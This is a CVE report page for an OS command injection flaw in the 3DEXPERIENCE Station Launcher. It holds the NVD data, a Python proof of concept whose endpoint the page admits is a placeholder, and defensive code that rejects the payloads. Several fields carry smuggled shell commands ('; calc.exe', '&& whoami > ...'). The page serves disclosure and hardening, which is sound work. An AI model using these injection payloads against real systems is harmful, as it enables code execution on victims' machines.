Security Vulnerability Report
CVE-2025-9976 CVSS 9.0 CRITICAL

CVE-2025-9976

Published: 2025-10-13 08:15:42
Last Modified: 2026-04-15 00:35:42

Description

An OS Command Injection vulnerability affecting Station Launcher App in 3DEXPERIENCE platform from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x could allow an attacker to execute arbitrary code on the user's machine. The CVSS vector is consistent with this: the attacker needs only low privileges on the platform (PR:L), a user must interact with the launcher (UI:R), and the impact lands on the user's workstation rather than on the component that receives the request (S:C), which is why the weakness is classified as CWE-78 (OS command injection) with full confidentiality, integrity and availability impact.

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

The NVD record carries no CPE configuration data (its vulnStatus is "Deferred"), so the affected releases below are taken from the description rather than from CPE matching:

3DEXPERIENCE R2022x
3DEXPERIENCE R2023x
3DEXPERIENCE R2024x
3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9976 PoC - OS Command Injection in 3DEXPERIENCE Station Launcher
# Vulnerability: Unvalidated input passed to OS command execution in Station Launcher App
# Affected: 3DEXPERIENCE R2022x through R2025x
#
# Caveat: the endpoint path and JSON field names below are illustrative placeholders.
# They are not confirmed by the references on this page; adapt them to the launcher
# request format observed in an authorised test environment.
import requests

TARGET_URL = "https://target-3dexperience-server"
AUTH_TOKEN = "low_privilege_user_token"

# Malicious payload - command injection via station launcher parameter
# The injected command will be executed on the victim's machine
MALICIOUS_PAYLOAD = {
    "launcher_action": "start",
    "app_id": "valid_app_id; calc.exe",  # Command injection via semicolon
    "params": "--user=admin && whoami > C:\\temp\\pwned.txt",  # Chained commands
    "session_id": "valid_session",
}


def exploit(target_url, auth_token, payload):
    """
    Send crafted request to Station Launcher endpoint with injected OS commands.
    When the victim interacts with the launcher, the injected commands execute locally.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json",
        "User-Agent": "3DEXPERIENCE-StationLauncher/2024",
    }
    # Endpoint that triggers command execution in Station Launcher
    endpoint = f"{target_url}/stationlauncher/v1/launch"
    response = requests.post(endpoint, json=payload, headers=headers, timeout=30)
    if response.status_code == 200:
        print("[+] Payload delivered successfully")
        # The commands run on the victim's workstation, not on the server that accepted the request
        print("[+] Injected commands execute on the victim's machine once the launcher acts on them")
    else:
        print(f"[-] Failed: {response.status_code}")


if __name__ == "__main__":
    exploit(TARGET_URL, AUTH_TOKEN, MALICIOUS_PAYLOAD)
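
The PoC above only works if shell metacharacters (';', '&&', '>') survive from the request into a command line that a shell interprets. The following added example is illustrative code, not the Station Launcher's own source (which this page does not contain): it shows the generic CWE-78 shape beside a hardened builder. The `launcher` binary name, the option allow-list and the identifier regex are assumptions; the two payload strings are taken verbatim from the PoC above and are used as constructed input.

```python
import re
import subprocess
from typing import List

# Hypothetical launcher executable, for illustration only (not the real Station Launcher binary).
LAUNCHER = "launcher"
# Allow-list for identifiers and option values: letters, digits, underscore, dot, dash.
SAFE_TOKEN = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# The only launcher options the hardened builder will forward (assumed set).
ALLOWED_OPTIONS = {"--user", "--workspace"}
# Control tokens a shell would interpret if the string reached one.
SHELL_META = (";", "&&", "||", "|", "`", "$(", ">", "<", "\n")


def build_command_unsafe(app_id: str, params: str) -> str:
    """CWE-78 shape: untrusted fields concatenated into a single command line.
    Handing this string to a shell (subprocess.run(..., shell=True), os.system,
    or cmd.exe on Windows) lets ';', '&&' and '>' in the input end the intended
    command and start attacker-chosen ones."""
    return f"{LAUNCHER} --app {app_id} {params}"


def shell_metacharacters(cmdline: str) -> List[str]:
    """Return the shell control tokens present in a command line."""
    return [tok for tok in SHELL_META if tok in cmdline]


def build_command_safe(app_id: str, params: List[str]) -> List[str]:
    """Hardened builder: validate every field against the allow-list and return
    an argv list, so each value reaches the launcher as exactly one argument."""
    if not SAFE_TOKEN.fullmatch(app_id):
        raise ValueError(f"rejected app_id {app_id!r}")
    argv = [LAUNCHER, "--app", app_id]
    for param in params:
        option, sep, value = param.partition("=")
        if option not in ALLOWED_OPTIONS or not sep or not SAFE_TOKEN.fullmatch(value):
            raise ValueError(f"rejected parameter {param!r}")
        argv.append(f"{option}={value}")
    return argv


def is_rejected(app_id: str, params: List[str]) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        build_command_safe(app_id, params)
    except ValueError:
        return True
    return False


def launch(app_id: str, params: List[str]) -> subprocess.CompletedProcess:
    """Execute without a shell: argv list, shell=False, no string interpolation."""
    return subprocess.run(build_command_safe(app_id, params), shell=False, check=False)


if __name__ == "__main__":
    # Constructed input mirroring the PoC payload on this page.
    evil_app_id = "valid_app_id; calc.exe"
    evil_params = "--user=admin && whoami > C:\\temp\\pwned.txt"
    cmdline = build_command_unsafe(evil_app_id, evil_params)
    print("unsafe command line :", cmdline)
    print("shell tokens present:", shell_metacharacters(cmdline))
    print("hardened rejects app_id:", is_rejected(evil_app_id, []))
    print("hardened rejects params:", is_rejected("valid_app_id", [evil_params]))
    print("hardened argv          :", build_command_safe("valid_app_id", ["--user=alice"]))
```

The fix has two independent parts: the argv list with `shell=False` removes the shell, so metacharacters become literal bytes in one argument, and the allow-list rejects them anyway, which also covers launchers that re-spawn a shell internally.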

References

https://www.3ds.com/trust-center/security/security-advisories/cve-2025-9976 (vendor advisory, the only reference in the source record below)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9976",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T08:15:41.547",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An OS Command Injection vulnerability affecting Station Launcher App in 3DEXPERIENCE platform from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x could allow an attacker to execute arbitrary code on the user's machine."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-9976",
        "source": "[email protected]"
      }
    ]
  }
}